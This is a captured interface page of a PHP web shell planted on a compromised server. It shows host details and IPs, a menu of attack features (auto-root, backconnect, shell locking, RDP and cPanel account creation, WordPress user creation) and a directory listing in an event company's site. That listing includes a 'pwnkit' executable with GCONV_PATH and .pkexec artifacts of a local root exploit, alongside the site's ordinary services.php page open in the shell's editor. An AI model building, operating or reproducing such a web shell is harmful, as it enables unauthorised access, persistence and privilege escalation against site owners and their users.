Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.218.150.169
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
milovo /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_.htaccess
0
B
-rw-r--r--
about.php
9.12
KB
-rw-r--r--
blog.php
10.34
KB
-rw-r--r--
contact.php
5.91
KB
-rw-r--r--
gallery.php
3.8
KB
-rw-r--r--
indexold.html
36.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
service-single.php
5.35
KB
-rw-r--r--
services.php
5.31
KB
-rw-r--r--
team.php
16.6
KB
-rw-r--r--
work.php
5.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php include("includes/header.php"); ?> <!--Page Title--> <section class="page-title" style="background-image:url(images/bg-parallax-01.jpg);"> <div class="container"> <h1>Our Services</h1> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Service</li> </ul> </div> </section> <!--End Page Title--> <section class="all-service pd-70"> <div class="container"> <div class="col-lg-8 col-md-8 col-12 blog-single mx-auto fs-18 text-center wow fadeInUp"> At Milovo Events, we offer comprehensive event management services designed to create memorable experiences. From corporate events to social gatherings, our team is dedicated to delivering excellence with every project. </div> <div class="sec-title my-5 text-center"> <span class="title mx-auto"> Your 360-Degree Event Solutions</span> <h2>Our Services</h2> </div> <div class="centerX row4"> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Corporate Events</h2> <p>Corporate Events Transform your corporate gatherings with our expert planning and execution. From conferences to team-building activities, we ensure every detail aligns with your business objectives.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Weddings</h2> <p>Weddings Craft your dream wedding with our bespoke wedding planning services. We handle everything from venue selection to décor, ensuring your special day is unforgettable.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Exhibitions</h2> <p>Exhibitions Stand out with our exhibition management services. We design and organize booths that attract and engage visitors, helping you make a lasting impression.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>MICE </h2> <p>MICE (Meetings, Incentives, Conferences, Exhibitions) Optimize your MICE events with our strategic planning and flawless execution. We deliver impactful meetings and conferences that drive business success.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Team Building</h2> <p>Team Building Strengthen your team with our engaging and motivational team-building activities. Designed to boost morale and enhance collaboration, our activities are tailored to meet your organizational goals.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Social Events</h2> <p>Social Events Host memorable social events with our creative solutions. Whether it’s a birthday party, anniversary, or any celebration, we make sure it’s an event to remember.</p> </a> </div> <!--1 --> <div class="services-list wow fadeInUp"> <a href="#"> <img class="img-fluid avatar" src="images/about-img-1.jpg" alt="work update"> <h2>Creative Communication</h2> <p>Creative Communication Enhance your event with our creative communication services. From branding to digital marketing, we ensure your message reaches and resonates with your audience.</p> </a> </div> <!--1 --> </div> </div> </section> <section class="clients-call"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-12"> <h2>Ready to plan your next event?</h2> <p class="mb-0">Contact Us today to discuss your needs and discover how Milovo Events can turn your vision into reality. </p> </div> <div class="col-lg-6 col-md-6 col-12 d-flex align-items-center"> <ul class="call-cmd d-flex gap-2"> <li><a class="btn-style-one" href="tel:+919871283909"><i class="fa-solid fa-phone-volume"></i> Call Us</a></li> <li><a class="btn-style-one" href="https://api.whatsapp.com/send?phone=9871283909&text=Hi%2C%20milovo"><i class="fa-brands fa-whatsapp"></i> Whatapp Us</a></li> <li><a class="btn-style-one" href="mailto:namit@milovoevents.in"><i class="icon fa-regular fa-envelope"></i> Email Us</a></li> </ul> </div> </div> </div> </section> <?php include("includes/footer.php"); ?>
Close